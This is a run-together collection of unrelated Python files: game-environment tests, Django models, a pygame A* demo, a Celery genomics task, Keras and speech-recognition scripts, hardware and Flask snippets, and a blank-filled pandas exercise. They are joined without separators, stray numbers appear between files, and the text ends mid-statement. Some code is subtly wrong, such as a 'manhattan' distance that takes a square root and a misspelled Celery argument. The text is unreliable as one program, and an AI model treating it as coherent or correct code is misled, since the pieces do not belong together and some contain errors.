@pytest.fixture(autouse=True) def _init( self, env_name: str, n_player_left: int, n_player_right: int, action_set: str, use_built_in_GK: bool, ): scenario_configs = { "env_name": env_name, "number_of_left_players_agent_controls": n_player_left, "number_of_right_players_agent_controls": n_player_right, "representation": "raw", "logdir": "", "write_goal_dumps": False, "write_full_episode_dumps": False, "render": False, "stacked": False, "other_config_options": {"action_set": action_set}, } self.env = BaseGFootBall( env_id="Gfootball", use_built_in_GK=use_built_in_GK, scenario_configs=scenario_configs, ) self.env.seed() self.env_id = "Gfootball" self.use_built_in_GK = use_built_in_GK self.scenario_configs = scenario_configs def test_env_api(self): rets = self.env.reset(max_step=20) act_spaces = self.env.action_spaces assert EpisodeKey.CUR_OBS in rets for _ in range(20): action = {aid: space.sample() for aid, space in act_spaces.items()} rets = self.env.step(action) assert self.env.cnt <= 20 assert rets[EpisodeKey.DONE]["__all__"], (self.env.cnt, rets[EpisodeKey.DONE]) print(self.env.collect_info()) def test_parameter_sharing_wrapper(self): mapping_func = lambda x: x[:6] env = ParameterSharing(self.env, mapping_func) state_spaces = env.state_spaces observation_spaces = env.observation_spaces act_spaces = env.action_spaces rets = env.reset(max_step=20) assert EpisodeKey.CUR_STATE in rets for aid, obs in rets[EpisodeKey.CUR_OBS].items(): assert obs.shape[1] == observation_spaces[aid].shape[0] for aid, state in rets[EpisodeKey.CUR_STATE].items(): assert len(state.shape) == 2 assert state_spaces[aid].shape[0] == state.shape[1], ( aid, state_spaces, state, ) for _ in range(20): actions = { aid: np.asarray( [space.sample()] * rets[EpisodeKey.CUR_OBS][aid].shape[0], dtype=int ) for aid, space in act_spaces.items() } rets = env.step(actions) # update next to cur rets[EpisodeKey.CUR_OBS] = rets[EpisodeKey.NEXT_OBS] rets[EpisodeKey.CUR_STATE] = rets[EpisodeKey.NEXT_STATE] assert self.env.cnt <= 20 assert rets[EpisodeKey.DONE]["__all__"], (self.env.cnt, rets[EpisodeKey.DONE]) env.close() @pytest.mark.parametrize( "group_func", [ lambda agent_id: agent_id, ], ) def test_group_wrapper(self, group_func): env = GroupedGFBall(self.env, group_func) state_spaces = env.state_spaces observation_spaces = env.observation_spaces action_spaces = env.action_spaces # check whether the group rule matches the group_func possible_agents = self.env.possible_agents for aid in possible_agents: group_pred = env.group_rule(aid) group_target = group_func(aid) assert group_pred == group_target, (group_pred, group_target) assert aid in state_spaces assert aid in observation_spaces assert aid in action_spaces rets = env.reset(max_step=20) assert EpisodeKey.CUR_STATE in rets for aid, obs in rets[EpisodeKey.CUR_OBS].items(): assert observation_spaces[aid].contains(obs) for aid, state in rets[EpisodeKey.CUR_STATE].items(): assert state_spaces[aid].contains(state) for _ in range(20): actions = {aid: space.sample() for aid, space in action_spaces.items()} rets = env.step(actions) # update next to cur rets[EpisodeKey.CUR_OBS] = rets[EpisodeKey.NEXT_OBS] rets[EpisodeKey.CUR_STATE] = rets[EpisodeKey.NEXT_STATE] assert self.env.cnt <= 20 assert rets[EpisodeKey.DONE]["__all__"], (self.env.cnt, rets[EpisodeKey.DONE]) env.close() from django.conf import settings from django.core import validators from django.db import models from django.urls import reverse from districts.models import District class Season(models.Model): start_year = models.PositiveIntegerField(unique=True, validators=[ validators.MinValueValidator(1990), validators.MaxValueValidator(2050)]) def __str__(self): return '{}/{}'.format(self.start_year, self.start_year + 1) class League(models.Model): name = models.TextField() abbreviation = models.TextField() district = models.ForeignKey(District, on_delete=models.CASCADE) season = models.ForeignKey(Season, on_delete=models.CASCADE) bhv_id = models.IntegerField(unique=True) class Meta: unique_together = (('name', 'district', 'season'), ('abbreviation', 'district', 'season')) def __str__(self): return '{} {} {}'.format(self.bhv_id, self.name, self.season) def get_absolute_url(self): return reverse('leagues:detail', kwargs={'bhv_id': self.bhv_id}) @staticmethod def build_source_url(bhv_id): return settings.ROOT_SOURCE_URL + 'Spielbetrieb/index.php?orgGrpID=1&all=1&score={}'.format(bhv_id) def source_url(self): return self.build_source_url(self.bhv_id) @property def youth(self) -> bool: return self.is_youth(self.abbreviation, self.name) @staticmethod def is_youth(abbreviation: str, name: str) -> bool: if name in ['Kreisliga A', 'K', 'K', 'Spielrunde Special Olympics']: return False if 'Mini' in name: return True youth_match = abbreviation[:1] in ['m', 'w', 'g', 'u', 'U'] \ or any(n in name for n in ['Jugend', 'Jgd', 'Mini', 'Jungen', 'Mädchen', 'Jongen', 'Meedercher', 'weiblich', 'männlich']) adult_match = abbreviation[:1] in ['M', 'F'] \ or any(n in name for n in ['Männer', 'Frauen', 'Herren', 'Damen', 'Hären', 'Dammen', 'Senioren', 'Seniorinnen']) if youth_match == adult_match: raise ValueError(f'Youth undecidable: {abbreviation} {name}') return youth_match # - last edit: 4/23/2020 @3PM import pygame, sys, random, math, time import constants from buttons import draw_rect from buttons import button_hover from buttons import button_press from buttons import text # Randomly generates obstacles - draws them red and returns the coordinates of them def random_fill(x, y, w, p): obstacle = (x, y) rand = random.randint(0, 50) if rand < p: pygame.draw.rect(surface, constants.RED, (x, y, w, w)) return obstacle # draws in the correctly sized grid and calls random_fill() for obstacles def draw(w, p, grid): obst_list = [] x, y = 0, 0 for row in grid: for col in row: pygame.draw.rect(surface, constants.BLUE, (x, y, w, w), 1) if x == 0 and y == 0: pygame.draw.rect(surface, constants.GREEN, (x, y, w, w)) pass elif x == 792 and y == 792 or x == 796 and y == 796 or x == constants.END_3X and y == constants.END_3Y: continue else: val = random_fill(x, y, w, p) if val is not None: obst_list.append(val) pygame.display.update() x = x + w y = y + w x = 0 return obst_list # straight line distance used for g def distance(nx, ny, gx, gy): g = math.sqrt((abs(gx - nx) ** 2) + (abs(gy - ny) ** 2)) return g # + h # manhattan distance used for h def manhattan(nx, ny, gx, gy): h = math.sqrt(abs(nx - gx) + abs(ny - gy)) return h # Generates all neighbors of the current node and removes based on if it is an obstacle, or if that node has been # traveled to before. Applies heuristic to neighbors and travels based on minimum f score. Recursively calls itself # and stores the path that it took for the repairing method. def astar(x, y, blocked, end, w): current = (x, y) all_neighbors = [(x + w, y), (x, y + w), (x + w, y + w), (x - w, y - w), (x - w, y), (x - w, y + w), (x, y - w), (x + w, y - w)] for i in blocked: if i in all_neighbors: all_neighbors.remove(i) for i in constants.PATH: if i in all_neighbors: all_neighbors.remove(i) neighbor_list1 = heuristic(all_neighbors, end) try: shortest = min(neighbor_list1, key=neighbor_list1.get) constants.SUM += neighbor_list1.get(shortest) for val, key in neighbor_list1.items(): if 0 <= val[0] < 800 and 0 <= val[1] < 800: if val == shortest: current = val pygame.draw.rect(surface, constants.GREEN, (*current, w, w)) pygame.time.wait(1) pygame.display.update() constants.PATH_DIST.append(key) try: current_index = constants.PATH_DIST.index(key) if constants.PATH_DIST[current_index] > constants.PATH_DIST[current_index - 3]: if (constants.PATH_DIST[current_index] - constants.PATH_DIST[current_index - 3]) < 100: blocked.append(current) except IndexError: continue except ValueError: pass constants.PATH.append(current) try: if current != end: astar(*current, blocked, end, w) except RecursionError: current_id = constants.PATH.index(current) if current != constants.START and constants.PATH[current_id - 1] != constants.START: blocked.append(current) blocked.append(constants.PATH[current_id - 1]) # print("(R)") return constants.SUM, constants.PATH # Takes in neighbor list and using a dictionary, stores the coordinates and calculated f score. Returns dictionary. def heuristic(neighbors, end): neighbor_list = {} counter = 0 if counter != len(neighbors): for i in neighbors: dist = distance(*i, *end) + (constants.INFLATION * manhattan(*i, *end)) # CONSTANT ENDING neighbor_list[i] = dist counter += 1 return neighbor_list # Method to visually clear the path that was taken - clears up for next iteration. def clear(path, w): for i in path: pygame.draw.rect(surface, constants.SEA_GREEN, (*i, w, w)) # iterates based on a decrementing W0, decremented inflation e is applied to the heuristic def repairing(path_sum, blocked, path, end, w): start_time = time.time() while constants.W0 > 0: clear(path, w) pygame.draw.rect(surface, constants.GREEN, (*end, w, w)) pygame.display.update() constants.PATH.clear() sum_next = astar(*constants.START, blocked, end, w) half_val = math.floor(sum_next[0] / 2) if sum_next[0] < path_sum: clear(path, w) pygame.display.update() elif half_val == math.floor(path_sum): break if constants.INFLATION >= 1: constants.INFLATION -= 1 constants.W0 -= constants.W1 print("RUN TIME: %s seconds" % (time.time() - start_time)) # called based on button press def choice(w, end, p, grid): start_time = time.time() constants.OBSTACLES = draw(w, p, grid) print("GRID GENERATION: %s seconds" % (time.time() - start_time)) traveled = astar(*constants.START, constants.OBSTACLES, end, w) repairing(traveled[0], constants.OBSTACLES, traveled[1], end, w) pygame.display.update() # main function def main(): surface.fill(constants.BLACK) text() while constants.END is False: for event in pygame.event.get(): if event.type == pygame.MOUSEBUTTONDOWN: button_press(event, surface) if event.type == pygame.QUIT: sys.exit() draw_rect(surface) button_hover(surface) pygame.init() surface = pygame.display.set_mode((constants.WIDTH + 200, constants.HEIGHT)) main() 0 from __future__ import absolute_import from celery.utils.log import get_task_logger from celery.signals import after_setup_task_logger from gwaportalpipeline.celery import celery from gwaportalpipeline.common import * from gwaportalpipeline import utils from gwaportalpipeline import permute from pygwas.core import genotype import bisect import numpy import h5py import os import operator import logging logger = get_task_logger(__name__) @after_setup_task_logger.connect def setup_task_logger(**kwargs): ph = CeleryProgressLogHandler(candidate_gene_list_enrichment) logger.addHandler(ph) @celery.task(serialiazer='json') def candidate_gene_list_enrichment(candidate_gene_list_id,study_id,genotypeid,windowSize,numberOfPermutations,top_snp_count): pval_file = None pval = None try: logger.info('Retrieving candidate gene list',extra={'progress':2}) candidate_genes = restclient.get_candidate_genes(candidate_gene_list_id) if len(candidate_genes) == 0: raise Exception('No genes found in candidate gene list') logger.info('Retrieve HDF5 File') pval_file = restclient.download_study_file(study_id,LOCAL_DATA_FOLDER) logger.info('Retrieve genotype') genotypeData = _load_genotype_(GENOTYPE_FOLDER,genotypeid) chr_regions = genotypeData.chr_regions chr_pos_list= zip(genotypeData.chromosomes,genotypeData.positions) pval = _candidate_gene_list_enrichment(candidate_genes,pval_file,chr_pos_list,chr_regions,windowSize,numberOfPermutations,top_snp_count) except Exception,err: logger.exception(err) raise err finally: if pval_file is not None: os.unlink(pval_file) return {'pvalue':pval} def _candidate_gene_list_enrichment(candidate_genes,pval_file,pos_chr_list,chr_regions,windowSize,numberOfPermutations,TOP_SNP_LIMIT): pos_chr_list = numpy.asarray(pos_chr_list) logger.info('Retrieve %s TOP GWAS SNPs' % TOP_SNP_LIMIT) top_snps = utils.get_top_snps(pval_file,TOP_SNP_LIMIT) logger.info('Retrieve TOP SNP Matrix') top_snps_matrix = _get_snps_snps_matrix(pos_chr_list,top_snps,chr_regions) logger.info('Retrieve Gene Matrix (windowsize:%s)' % windowSize) candidate_gene_matrix = _get_gene_snps_matrix(pos_chr_list,candidate_genes,chr_regions,windowSize) per = permute.permute() per.load_vectors(candidate_gene_matrix,top_snps_matrix) logger.info('Starting permutation test (#: %s)' % numberOfPermutations,extra={'progress':5}) pval = per.permute_p_val(numberOfPermutations) logger.info('Finished permutation test',extra={'progress':95}) return pval def _get_snps_snps_matrix(snps,top_snps,chr_regions): # sort by chr and position #use lexsort top_snps.sort(order=['chr','position']) chr_start = 0 chr_start_ix = 0 indices = [] vector = numpy.zeros((len(snps),),dtype='int32') for snp in top_snps: chr = int(snp[0]) if chr != chr_start: chr_start = chr chr_start_ix = chr_regions[chr-1][0] chr_end_ix = chr_regions[chr-1][1] indices.append(chr_start_ix + snps[chr_start_ix:chr_end_ix][:,1].searchsorted(snp[1])) vector[indices] = 1 return vector def _get_gene_snps_matrix(snps,genes,chr_regions,windowsize): # sort by gene name and first position sorted_genes = sorted(genes, key=operator.itemgetter(3, 0)) chr_start = 0 chr_start_ix = 0 indices = [] vector = numpy.zeros((len(snps),),dtype='int32') for gene in sorted_genes: chr = int(gene[3][2]) if chr != chr_start: chr_start = chr chr_start_ix = chr_regions[chr-1][0] chr_end_ix = chr_regions[chr-1][1] ix_start = chr_start_ix+ snps[chr_start_ix:chr_end_ix][:,1].searchsorted(gene[0]-windowsize,side='left') ix_end = chr_start_ix + snps[chr_start_ix:chr_end_ix][:,1].searchsorted(gene[1]+windowsize,side='right') vector[ix_start:ix_end] = 1 return vector def _load_genotype_(folder,genotype_id): data_format = 'binary' file_prefix = os.path.join(folder,str(genotype_id)) hdf5_file = os.path.join(file_prefix,'all_chromosomes_%s.hdf5' % data_format) if os.path.isfile(hdf5_file): return genotype.load_hdf5_genotype_data(hdf5_file) raise Exception('No Genotype files in %s folder were found.' % file_prefix) def test_respx_mock_fixture(testdir): testdir.makepyfile( """ import httpx import pytest def test_plain_fixture(respx_mock): route = respx_mock.get("https://foo.bar/") % 204 response = httpx.get("https://foo.bar/") assert response.status_code == 204 @pytest.mark.respx(base_url="https://foo.bar", assert_all_mocked=False) def test_marked_fixture(respx_mock): route = respx_mock.get("/") % 204 response = httpx.get("https://foo.bar/") assert response.status_code == 204 response = httpx.get("https://example.org/") assert response.status_code == 200 """ ) result = testdir.runpytest("-p", "respx") result.assert_outcomes(passed=2) afishas/progs/proc6c.py #! /usr/bin/env python3 # , 2020 # proc6b.py 2020-11-19 2020-11-19 0.1 # АСАП, КААП # обработка бард-афиши, дамп DBMS sqlite3 в tab- файл, архивист: М.Колодин import sqlite3 db = 'apx.db' txt = 'apx.tab' conn = sqlite3.connect(db) cur = conn.cursor() rep = 0 with open(txt, 'w') as tf: tf.write("id wd year date datesql time city place what desc source status shown uuid\n") for row in cur.execute('select * from data order by datesql asc, time asc'): rep += 1 print(rep % 10, end="", flush=True) # ~ if rep > 9: break a = list(row) a[7] = a[7].strip() a[8] = a[8].strip() a[9] = a[9].strip() a[10] = a[10].strip() a[11] = a[11].strip() a[12] = a[12].strip() #0 1 2 3 4 5 6 7 8 9 10 11 12 13 #N wd year date datesql time city place what desc source status shown uuid\n') tf.write(f"{a[0]}\t{a[1]}\t{a[2]}\t{a[3]}\t{a[4]}\t{a[5]}\t{a[6]}\t{a[7]}\t{a[8]}\t{a[9]}\t{a[10]}\t{a[11]}\t{a[12]}\t{a[13]}\n") conn.close() print(f"обработано событий: {rep}") # coding:utf-8 import gc import os import numpy as np import pandas as pd from nltk import word_tokenize from nltk.corpus import stopwords from nltk.stem.wordnet import WordNetLemmatizer from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from sklearn.model_selection import KFold from keras.models import Sequential from keras.layers import Embedding, SimpleRNN, Dense from keras.losses import msle from keras.optimizers import Adam from keras.callbacks import EarlyStopping np.random.seed(7) def rmsle(y_true, y_pred): import keras.backend as K return K.sqrt(msle(y_true, y_pred)) class PrepareOverviewRnn(object): def __init__(self, *, input_path, output_path): self.__input_path, self.__output_path = input_path, output_path self.__train, self.__test = [None for _ in range(2)] self.__train_feature, self.__test_feature = [None for _ in range(2)] self.__train_label, self.__test_label = [None for _ in range(2)] self.__tok = None self.__mle = None self.__folds = None self.__oof_preds = None self.__sub_preds = None def read_data(self): self.__train = pd.read_csv(os.path.join(self.__input_path, "train.csv")) self.__test = pd.read_csv(os.path.join(self.__input_path, "test.csv")) def prepare_data(self): self.__train_feature = self.__train[["overview"]].copy() self.__test_feature = self.__test[["overview"]].copy() self.__train_label = self.__train["revenue"].copy() del self.__train, self.__test gc.collect() # train clean # 去除非字母符号 self.__train_feature["overview"] = \ self.__train_feature["overview"].str.lower().str.replace(r"[^a-zA-Z]", " ") # 分词 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda text: word_tokenize(text)) # 去除非单词 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: [word for word in words if word.isalpha()]) # 去除停用词 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: [word for word in words if word not in stopwords.words("english")]) # 词形还原 词干提取 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="n") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="v") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="a") for word in words]) # 拼接 list 成 string 以便 vectorizer 使用 self.__train_feature["overview"][~self.__train_feature["overview"].isna()] = \ self.__train_feature["overview"][~self.__train_feature["overview"].isna()].apply( lambda words: " ".join(words)) # 填充缺失值 self.__train_feature["overview"] = self.__train_feature["overview"].fillna(" ") # test clean self.__test_feature["overview"] = \ self.__test_feature["overview"].str.lower().str.replace(r"[^a-zA-Z]", " ") self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda text: word_tokenize(text)) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: [word for word in words if word.isalpha()]) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: [word for word in words if word not in stopwords.words("english")]) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="n") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="v") for word in words]).apply( lambda words: [WordNetLemmatizer().lemmatize(word, pos="a") for word in words]) self.__test_feature["overview"][~self.__test_feature["overview"].isna()] = \ self.__test_feature["overview"][~self.__test_feature["overview"].isna()].apply( lambda words: " ".join(words)) self.__test_feature["overview"] = self.__test_feature["overview"].fillna(" ") self.__tok = Tokenizer(split=" ") self.__tok.fit_on_texts(self.__train_feature["overview"]) self.__train_feature = self.__tok.texts_to_sequences(self.__train_feature["overview"]) self.__test_feature = self.__tok.texts_to_sequences(self.__test_feature["overview"]) self.__mle = int(np.percentile([len(element) for element in self.__train_feature], [95])) self.__train_feature = pad_sequences(self.__train_feature, maxlen=self.__mle) self.__test_feature = pad_sequences(self.__test_feature, maxlen=self.__mle) self.__train_label = self.__train_label.values def fit_predict_model(self): embeddings_index = dict() with open("E:\\Kaggle\\TMDB_Box_Office_Prediction\\glove\\glove.6B.50d.txt", mode="r", encoding="utf-8") as f: line = f.readline() while line: values = line.split() word = values[0] embeddings_index[word] = np.array(values[1:], dtype="float32") line = f.readline() embedding_matrix = np.zeros((len(self.__tok.word_index) + 1, 50)) for word, i in self.__tok.word_index.items(): embedding_vector = embeddings_index.get(word) if embedding_vector is not None: embedding_matrix[i] = embedding_vector self.__folds = KFold(n_splits=5, shuffle=True, random_state=7) self.__oof_preds = np.zeros(shape=self.__train_feature.shape[0]) self.__sub_preds = np.zeros(shape=self.__test_feature.shape[0]) for n_fold, (trn_idx, val_idx) in enumerate(self.__folds.split(self.__train_feature, self.__train_label)): trn_x, trn_y = self.__train_feature[trn_idx], self.__train_label[trn_idx] val_x, val_y = self.__train_feature[val_idx], self.__train_label[val_idx] net = Sequential() net.add(Embedding( input_dim=len(self.__tok.word_index) + 1, output_dim=50, weights=[embedding_matrix], input_length=self.__mle, trainable=False )) net.add(SimpleRNN(units=2)) # overfitting net.add(Dense(1, activation="linear")) net.compile(loss=rmsle, optimizer=Adam()) net.fit( x=trn_x, y=np.log1p(trn_y), batch_size=32, epochs=10, verbose=2, callbacks=[EarlyStopping(monitor="val_loss", mode="min", patience=2)], validation_data=(val_x, val_y) ) pred_val = np.expm1(net.predict(val_x)).reshape(-1, ) # predict shape (, 1) pred_test = np.expm1(net.predict(self.__test_feature)).reshape(-1, ) self.__oof_preds[val_idx] = pred_val self.__sub_preds += pred_test / self.__folds.n_splits del trn_x, trn_y, val_x, val_y gc.collect() def write_data(self): pd.Series(self.__oof_preds) \ .to_frame("train_rnn_overview") \ .to_csv(os.path.join(self.__output_path, "train_rnn_overview.csv"), index=False) pd.Series(self.__sub_preds) \ .to_frame("test_rnn_overview") \ .to_csv(os.path.join(self.__output_path, "test_rnn_overview.csv"), index=False) if __name__ == "__main__": por = PrepareOverviewRnn( input_path="E:\\Kaggle\\TMDB_Box_Office_Prediction\\raw", output_path="E:\\Kaggle\\TMDB_Box_Office_Prediction\\output" ) por.read_data() por.prepare_data() por.fit_predict_model() por.write_data()import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' # This is a little hack. if we don't throw erro into /dev/null, # python-shell catch the error. import sys stderr = sys.stderr sys.stderr = open('/dev/null', 'w') import numpy as np from data_generator import AudioGenerator from keras import backend as K from utils import int_sequence_to_text from keras.backend.tensorflow_backend import set_session import tensorflow as tf # import NN architectures for speech recognition from sample_models import * # This is a little hack. if we don't throw erro into /dev/null, # finally back to stderr normal sys.stderr = stderr def get_predictions(audio_path, input_to_softmax, model_path): """ Print a model's decoded predictions Params: index (int): The example you would like to visualize partition (str): One of 'train' or 'validation' input_to_softmax (Model): The acoustic model model_path (str): Path to saved acoustic model's weights """ # print("OK"); # return; # load the train and test data data_gen = AudioGenerator(spectrogram=False, mfcc_dim=13) # read and get features # audio_path = "./samples/16/19/16-19-0159.wav" # print("audio_path:{}".format(audio_path)) # data not normalized yet data_point = data_gen.featurize(audio_path) # print("shape:{}".format(data_gen.featurize(audio_path).shape)) # print("feats_mean: {}".format(data_gen.feats_mean)) # print("feats_std: {}".format(data_gen.feats_std)) # print("feats_mean: {}".format(data_gen.feats_mean.shape)) # print("feats_std: {}".format(data_gen.feats_std.shape)) feats_mean = np.array([14.81652005, -0.1802923, -1.22285122, 0.87062853, -16.05643781, -14.03943633, -5.7298706, -15.52425927, -3.39637537, -3.85226744, -5.17435844, -2.13766871, -11.39111645]) feats_std = np.array([7.16816358, 14.58747728, 11.99928947, 15.69431836, 14.45918537, 16.79930368, 13.98395715, 12.60133111, 11.61310503, 11.34526655, 12.01205471, 13.41467652, 10.89021869]) # print("feats_mean: {}".format(feats_mean)) # print("feats_std: {}".format(feats_std)) # print("feats_mean: {}".format(feats_mean.shape)) # print("feats_std: {}".format(feats_std.shape)) # print(data_gen.featurize(audio_path).shape) # normalize data eps = 1e-14 data_point = (data_point - feats_mean) / (feats_std + eps) # data_point = data_gen.normalize(data_gen.featurize(audio_path)) # print("data_point,shape:{}".format(data_point.shape)) # obtain and decode the acoustic model's predictions input_to_softmax.load_weights(model_path) prediction = input_to_softmax.predict(np.expand_dims(data_point, axis=0)) output_length = [input_to_softmax.output_length(data_point.shape[0])] pred_ints = (K.eval(K.ctc_decode( prediction, output_length)[0][0])+1).flatten().tolist() recognized_text = "".join(int_sequence_to_text(pred_ints)) print(recognized_text) # # play the audio file, and display the true and predicted transcriptions # print('-'*80) # # Audio(audio_path) # # print('True transcription:\n' + '\n' + transcr) # print('-'*80) # print('Predicted transcription:\n' + '\n' + ''.join(int_sequence_to_text(pred_ints))) # print('-'*80) def main(argv): # if (argv) # argv_1 = argv[1] # print("argv_1: {}".format(argv_1)) print("argv_1: {}".format( len(argv) )) # print("argv, len:{}".format(len(argv))) print("argv:{}".format(argv)) if len(argv) < 2: print("error") return # /home/kouohhashi/AIND-VUI-Capstone/samples/16/13/16-13-0000.wav audio_path = argv[1] print(audio_path) # return; # print(get_predictions) # get_predictions(audio_path=audio_path, input_to_softmax=final_model(input_dim=13, # change to 13 if you would like to use MFCC features filters=200, kernel_size=11, conv_stride=2, conv_border_mode='valid', units=200, output_dim=85), model_path='/home/kouohhashi/AIND-VUI-Capstone/results/model_end.h5') if __name__ == '__main__': main(sys.argv) # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. import torch import numpy as np def evaluate_nll(model, test_set, batch_size=32, return_nll_list=False): was_training = model.training model.eval() cum_nll = 0. cum_ppl = 0. cum_examples = 0. nll_dict = dict() with torch.no_grad(): for batch_examples in test_set.batch_iter(batch_size): log_probs = -model(batch_examples)['log_probs'] batch_code_tokens_num = torch.tensor([len(e.updated_data) for e in batch_examples], dtype=torch.float, device=log_probs.device) batch_nlls = log_probs.cpu().numpy() batch_ppls = (log_probs / batch_code_tokens_num).cpu().numpy() for batch_id in range(len(batch_examples)): nll_dict[batch_examples[batch_id].id] = batch_nlls[batch_id] cum_ppl += batch_ppls.sum() cum_nll += batch_nlls.sum() cum_examples += len(batch_examples) del log_probs avg_ppl = np.exp(cum_ppl / cum_examples) avg_nll = cum_nll / cum_examples if was_training: model.train(was_training) if return_nll_list: return avg_nll, avg_ppl, nll_dict else: return avg_nll, avg_ppl 0 # Generated by Django 3.1 on 2020-10-02 21:03 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('subscription', '0002_auto_20200930_0017'), ] operations = [ migrations.AlterField( model_name='subscription', name='sub_type', field=models.CharField(choices=[('W', 'week'), ('M', 'month'), ('Y', 'year'), ('L', 'life_time')], default='M', max_length=2), ), ] 1-10 from typing import Dict from flask_babel import _ from anyway.backend_constants import BE_CONST as BE from anyway.request_params import RequestParams from anyway.widgets.suburban_widgets.killed_and_injured_count_per_age_group_widget_utils import ( KilledAndInjuredCountPerAgeGroupWidgetUtils, ) from anyway.widgets.suburban_widgets.sub_urban_widget import SubUrbanWidget from anyway.widgets.widget import register @register class KilledInjuredCountPerAgeGroupWidget(SubUrbanWidget): name: str = "killed_and_injured_count_per_age_group" def __init__(self, request_params: RequestParams): super().__init__(request_params, type(self).name) self.rank = 14 def generate_items(self) -> None: raw_data = KilledAndInjuredCountPerAgeGroupWidgetUtils.filter_and_group_injured_count_per_age_group( self.request_params ) structured_data_list = [] for age_group, severity_dict in raw_data.items(): count_total = 0 for count in severity_dict.values(): count_total += count structured_data_list.append({BE.LKEY: age_group, BE.VAL: count_total}) self.items = structured_data_list @staticmethod def localize_items(request_params: RequestParams, items: Dict) -> Dict: items["data"]["text"] = { "title": _("Injury per age group"), "subtitle": _("In") + " " + request_params.location_info["road_segment_name"], } return items import time from grove.grove_light_sensor_v1_2 import GroveLightSensor from grove.grove_led import GroveLed light_sensor = GroveLightSensor(0) led = GroveLed(5) while True: light = light_sensor.light print('Light level:', light) if light < 200: led.on() else: led.off() time.sleep(1)import pandas as pd # Read in the data from the text file using the full pathway # Use the pokemon name as the index ____ = ____(____, ____, ____) # Display the first 10 rows ____examples/basic/toggle_tmr.py """ Toggle TMR Example ------------------- This is an example of doing TMR on a basic design using SpyDrNet TMR. First, we start with a simple design that includes a LUT and a flip flop. The following block is SystemVerilog code: .. code-block:: sv module toggle( input wire logic clk, reset, output logic out ); always_ff @(posedge clk) if (reset) out <= 0; else out <= ~out; endmodule .. figure:: ../../figures/toggle_original.png :width: 600px :align: center Original Design Then we find the instances and ports to replicate. Note that in the following code that the only ports specified to be triplicated are the input ports that are not the clock (so just the reset port). We also find the voter insertion points. .. code-block:: hinstances_to_replicate = list(netlist.get_hinstances(recursive=True, filter=lambda x: x.item.reference.is_leaf() is True)) instances_to_replicate = list(x.item for x in hinstances_to_replicate) hports_to_replicate = list(netlist.get_hports(filter = lambda x: x.item.direction is sdn.IN)) for x in hports_to_replicate: if "clk" in x.name: hports_to_replicate.remove(x) ports_to_replicate = list(x.item for x in hports_to_replicate) insertion_points = find_after_ff_voter_points([*hinstances_to_replicate, *hports_to_replicate], {'FDRE', 'FDSE', 'FDPE', 'FDCE'}) Next, we triplicate the design using apply_nmr(). The instances and ports we specified are passed as two of the parameters. We also pass '3' and 'TMR' as number of replications and the applicable suffix, respectively. .. code-block:: replicas = apply_nmr([*instances_to_replicate, *ports_to_replicate], 3, name_suffix='TMR', rename_original=True) .. figure:: ../../figures/toggle_just_tmr.png :width: 600px :align: center Design After Triplication Then we insert voters using insert_organs(). .. code-block:: voters = insert_organs(replicas, insertion_points, XilinxTMRVoter(), 'VOTER') While viewing the schematic, note that the voters' outputs feed back into the flip flops. This will get the flip flop onto the correct state if its previous output was outvoted. Also note that one of the voters outputs to the 'out' port. .. figure:: ../../figures/toggle_tmr_with_voters.png :width: 600px :align: center Final Design **See the full code below** """ import spydrnet as sdn from spydrnet.uniquify import uniquify from spydrnet_tmr import apply_nmr, insert_organs from spydrnet_tmr.analysis.voter_insertion.find_after_ff_voter_points import ( find_after_ff_voter_points, ) from spydrnet_tmr.transformation.replication.organ import XilinxTMRVoter netlist = sdn.load_example_netlist_by_name("toggle") uniquify(netlist) hinstances_to_replicate = list( netlist.get_hinstances( recursive=True, filter=lambda x: x.item.reference.is_leaf() is True ) ) instances_to_replicate = list(x.item for x in hinstances_to_replicate) hports_to_replicate = list( netlist.get_hports(filter=lambda x: x.item.direction is sdn.IN) ) for x in hports_to_replicate: if "clk" in x.name: hports_to_replicate.remove(x) ports_to_replicate = list(x.item for x in hports_to_replicate) insertion_points = find_after_ff_voter_points( [*hinstances_to_replicate, *hports_to_replicate], {"FDRE", "FDSE", "FDPE", "FDCE"}, ) replicas = apply_nmr( [*instances_to_replicate, *ports_to_replicate], 3, name_suffix="TMR", rename_original=True, ) voters = insert_organs(replicas, insertion_points, XilinxTMRVoter(), "VOTER") netlist.compose("toggle_tmr.edf") __init__.py from es_store import lambda_handler import os import json from functools import partial from typing import Optional import requests from urllib.parse import urljoin from urllib.parse import quote from tenacity import retry from .httpapi import MiraiHttpApi from .session import MiraiSession from .message.chain import MessageChain from .message.messages import Message class MiraiApi(object): def __init__(self, host: str, authKey: str): self.host = host self.authKey = authKey self.llapi = MiraiHttpApi(host) def get_session(self, account: str): return MiraiSession(self.llapi, account, self.authKey) from flask import request from flask_login import current_user from . import v1_api as api from .. import db from ..decorators import paginate, sudo_required from ..models import Company from ..utils import send_response, log_activity @api.route('/companies/', methods=['GET']) @paginate('companies') @sudo_required def get_companies(): return Company.query.order_by(Company.id) @api.route('/companies/', methods=['GET']) @sudo_required def get_company(company_id): return Company.query.get_or_404(company_id) @api.route('/companies', methods=['POST']) @sudo_required def create_new_company(): company = 